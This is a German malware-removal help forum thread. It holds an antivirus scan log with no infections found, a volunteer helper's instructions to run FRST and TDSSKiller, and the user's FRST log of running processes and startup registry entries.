C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/SamsungRapidDiskFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/dp.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/addfilter.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/DIFxAPI.dll
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/addfilter.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/SamsungRapidDiskFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/i386/SamsungRapidDiskFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/SamsungRapidFSFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/i386/SamsungRapidFSFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/SamsungRapidFSFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/OpenSourceAnnouncement.txt
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/Tools/RAPIDCollectLogs/README.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Help.pdf
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/install.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/LIMITATIONS.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/OpenSourceAnnouncement.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/RELEASE_NOTES.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/dp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/SamsungRapidDiskFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/amd64/SamsungRapidFSFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/Tools/RAPIDCollectLogs/RAPIDCollectLogs.bat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/DIFxAPI.dll
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/rp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/SamsungRapidApp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/SamsungRapidDiskFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/SamsungRapidFSFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/SamsungRapidFSFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/OpenSourceAnnouncement.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/SamsungRapidSvc.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/Tools/RAPIDCollectLogs/RAPIDCollectLogs.bat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/Tools/RAPIDCollectLogs/README.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/dp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/addfilter.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/DIFxAPI.dll
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/i386/SamsungRapidDiskFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/i386/SamsungRapidFSFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/rp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/SamsungRapidApp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/SamsungRapidDiskFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/SamsungRapidDiskFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/SamsungRapidFSFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/OpenSourceAnnouncement.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/SamsungRapidSvc.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/Tools/RAPIDCollectLogs/README.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/dp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/addfilter.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/amd64/SamsungRapidDiskFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/amd64/SamsungRapidFSFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/DIFxAPI.dll
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/rp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/SamsungRapidApp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/SamsungRapidDiskFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/SamsungRapidDiskFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/SamsungRapidFSFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/OpenSourceAnnouncement.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/SamsungRapidSvc.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/Tools/RAPIDCollectLogs/RAPIDCollectLogs.bat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/Tools/RAPIDCollectLogs/README.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/dp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/addfilter.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/DIFxAPI.dll
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/i386/SamsungRapidFSFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/rp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/SamsungRapidApp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/SamsungRapidDiskFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/SamsungRapidDiskFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/SamsungRapidFSFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/SamsungRapidFSFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/OpenSourceAnnouncement.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/Tools/RAPIDCollectLogs/RAPIDCollectLogs.bat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/Tools/RAPIDCollectLogs/README.txt
Password-protected
Not scanned (file was password-protected)
[-]Detailed Scan Summary
[-]Basic
Scanned items : 2328487
Infected items : 0 (no infected items have been detected)
Suspicious items : 0 (no suspected items have been detected)
Resolved items : 0 (no threats have been detected during this scan)
Unresolved items : 0 (no issues remained unresolved)
[+]Advanced
[-]Scan Options
[-]Target Threat Types:
Scan for viruses : Yes
Scan for adware : Yes
Scan for spyware : Yes
Scan for applications : Yes
Scan for dialers : Yes
Scan for rootkits : Yes
Scan for keyloggers : Yes
[-]Target Selection Options:
Scan registry keys : Yes
Scan cookies : Yes
Scan boot sectors : Yes
Scan memory processes : Yes
Scan archives : Yes
Scan runtime packers : Yes
Scan emails : Yes
Scan all files : Yes
Heuristic Scan : Yes
Scanned extensions : none configured
Excluded extensions : none configured
[-]Target Processing:
Default primary action for infected objects : None
Default secondary action for infected objects : None
Default primary action for suspicious objects : None
Default secondary action for suspicious objects : None
Default action for hidden objects : Disinfect
Default action for password-protected objects : Log as not scanned
[-]Scan engines summary
Number of virus signatures : 8811655
         
__________________


Alt 21.05.2017, 20:44   #3
M-K-D-B
/// TB-Ausbilder
 
Trojaner, Adware oder sonstiges ? - Standard

Trojaner, Adware oder sonstiges ?









Mein Name ist Matthias und ich werde dir bei der Bereinigung deines Computers helfen.



Um die Bereinigung möchlichst effektiv und schnell gestalten zu können, bitte ich um Beachtung der folgenden Hinweise:
  1. Falls wir Hinweise auf illegal erworbene Software finden, werden wir den Support unterbrechen bis jegliche Art von illegaler Software vom Rechner entfernt wurde.
  2. Lies dir meine Anleitungen immer sorgfältig durch, arbeite alle Schritte in der vorgegebenen Reihefolge nacheinander ab und poste immer alle Logdateien (auch wenn nichts gefunden wurde). Solltest du Probleme haben, stoppe mit deiner Bearbeitung und beschreibe mir dein Problem so gut es geht.
  3. Solltest du mir nicht innerhalb von 3 Tagen antworten, gehe ich davon aus, dass du keine Hilfe mehr benötigst. Dann lösche ich dein Thema aus meinem Abo. Solltest du einmal länger abwesend sein, so gib mir bitte Bescheid!
  4. Während der Bereinigung bitte nichts installieren oder deinstallieren, außer ich bitte dich darum!
    Außerdem bitte ich dich, nicht eigenmächtig irgendwelche Sicherheitsprogramme auszuführen und damit deinen Rechner zu überprüfen/bereinigen, da ich so leicht den Überblick verlieren kann.
    Außerdem hättest du dir das Eröffnen eines Themas in diesem Fall auch gleich sparen können, wenn du dann doch wieder alleine rumhantierst.

  5. Bitte beachten: Download bei filepony.de: So ladet Ihr unsere Tools richtig!
  6. Alle zu verwendenen Programme sind auf dem Desktop ( C:\users\dein Benutzername\Desktop\ ) abzuspeichern und von dort als Administrator zu starten!
  7. Einige Programme, die wir hier verwenden, können unter Umständen von deinem Antiviren- oder Anti-Malwareprogramm fälschlicherweise als Bedrohung eingestuft werden. Die Sicherheitsprogramme können aufgrund eines bestimmten Programmverhaltens nicht zwischen "gut" oder "böse" unterscheiden und schlagen Alarm. Dabei handelt es sich um Fehlalarme, welche du getrost ignorieren kannst. Gegebenenfalls musst du deine Sicherheitssoftware vor der Ausführung eines Programms deaktivieren, damit unsere Bereinigungsvorgänge nicht beeinträchtigt werden.
  8. Sollten die Logdateien einmal die zulässige Länge (~ 120.000 Zeichen) überschreiten, so teile die Logdateien auf mehrere Posts auf.
    Zur Not kannst du die Logdateien dann auch zippen (in ein .zip Archiv packen) und als Anhang hochladen.

  9. Bitte arbeite so lange mit mir zusammen, bis ich dir sage, dass wir fertig sind und dein Rechner "sauber" ist. Das vorzeitige Verschwinden von Symptomen heißt nicht automatisch, dass dein Rechner bereits vollständig sauber ist.
  10. In der Regel antworte ich dir innerhalb von 24 Stunden, oft sogar wesentlich schneller.
    Jedoch habe auch ich einen normalen Beruf und Familie. Ich bin daher nicht jeden Tag stundenlag hier im Forum unterwegs. Es kann unter Umständen bis zu 2 Tage dauern, bis du eine Antwort von mir erhältst. Sollte diese Zeit überschritten sein, so kannst du mir gerne eine PM als Erinnerung schicken.





Bitte arbeite alle Schritte in der vorgegebenen Reihefolge nacheinander ab und poste alle Logdateien in CODE-Tags:
So funktioniert es:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert deinem Helfer massiv die Arbeit, es sei denn natürlich die Datei wäre ansonsten zu groß für das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
  • Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
  • Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
  • Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
  • Klicke aauf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.

Danke für deine Mitarbeit!







Schritt 1
Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop: FRST Download FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
  • Starte jetzt FRST.
  • Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
  • Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
  • Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)







Schritt 2
Downloade dir bitte TDSSKiller TDSSKiller.exe und speichere diese Datei auf dem Desktop
  • Starte die TDSSKiller.exe - Einstellen wie in der Anleitung zu TDSSKiller beschrieben.
  • Drücke Start Scan
  • Sollten infizierte Objekte gefunden werden, wähle keinesfalls Cure. Wähle Skip und klicke auf Continue.
    TDSSKiller wird eine Logfile auf deinem Systemlaufwerk speichern (Meistens C:\)
    Als Beispiel: C:\TDSSKiller.<Version_Datum_Uhrzeit>log.txt
Poste den Inhalt bitte in jedem Fall hier in deinen Thread.







Bitte poste mit deiner nächsten Antwort
  • die Logdatei von TDSS-Killer,
  • die beiden neuen Logdateien von FRST.
__________________
__________________

Alt 21.05.2017, 21:13   #4
dinoexe
 
Trojaner, Adware oder sonstiges ? - Standard

Trojaner, Adware oder sonstiges ?



Hallo Matthias, ich bin David.

vielen Dank für deine Unterstützung. Anbei die geforderten Logs.

Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 20-05-2017
durchgeführt von Dino (Administrator) auf **** (21-05-2017 21:04:57)
Gestartet von D:\Dino\Downloads
Geladene Profile: Dino (Verfügbare Profile: Dino)
Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
() C:\Windows\SysWOW64\ASGT.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
(Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe
() C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
(ASUS) C:\Program Files (x86)\ASUS\GPU Tweak\Monitor.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
() C:\Program Files (x86)\ASUS\AI Suite III\AsusMiniBar.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(Spotify Ltd) C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Samsung) C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
(Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
() C:\Program Files (x86)\Drakonia Configurator\hid.exe
() C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
(Samsung Electronics.) C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(AO Kaspersky Lab) D:\Dino\Downloads\tdsskiller.exe
(AO Kaspersky Lab) C:\Users\Dino\AppData\Local\Temp\{F74CDBD7-0132-474B-A4A1-3396D3D0D72B}\{F7FBBE79-94C0-4F7E-B4EF-32EDEA81ED75}.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.15063.0_none_1a733a82001933cc\TiWorker.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8466136 2015-04-30] (Realtek Semiconductor)
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [438888 2014-01-15] (CANON INC.)
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [210432 2016-07-05] (Geek Software GmbH)
HKLM-x32\...\Run: [GamingMouse] => C:\Program Files (x86)\Drakonia Configurator\hid.exe [248832 2013-10-29] ()
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [Spotify Web Helper] => C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-02-19] (Spotify Ltd)
